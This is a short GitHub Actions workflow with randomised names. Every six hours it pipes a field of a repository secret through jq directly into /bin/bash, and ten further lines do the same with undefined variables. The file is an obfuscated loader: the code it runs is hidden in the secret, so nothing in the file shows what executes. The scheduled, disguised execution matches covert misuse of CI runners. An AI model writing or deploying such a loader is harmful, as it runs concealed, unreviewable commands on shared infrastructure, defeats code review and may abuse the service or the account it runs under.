name: laoqiuling8311
on:
  workflow_dispatch:
  schedule:
    - cron: '56 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: laoqiuling8311
        env:
          wsntc68: ${{ secrets.wsntc68 }}
        run: |
          echo $wsntc68 | jq -r .kgdys6 | /bin/bash
          echo $rt2610 | jq -r .a9440 | /bin/bash
          echo $uyh31 | jq -r .kxwjb615 | /bin/bash
          echo $go14 | jq -r .xv481 | /bin/bash
          echo $l71 | jq -r .krrez15095 | /bin/bash
          echo $sj0085 | jq -r .ez41 | /bin/bash
          echo $sez46 | jq -r .waxds10812 | /bin/bash
          echo $w834 | jq -r .rl004 | /bin/bash
          echo $pdnnv8894 | jq -r .yx01 | /bin/bash
          echo $nxl38 | jq -r .z15505 | /bin/bash
          echo $gwtnc3 | jq -r .z0 | /bin/bash

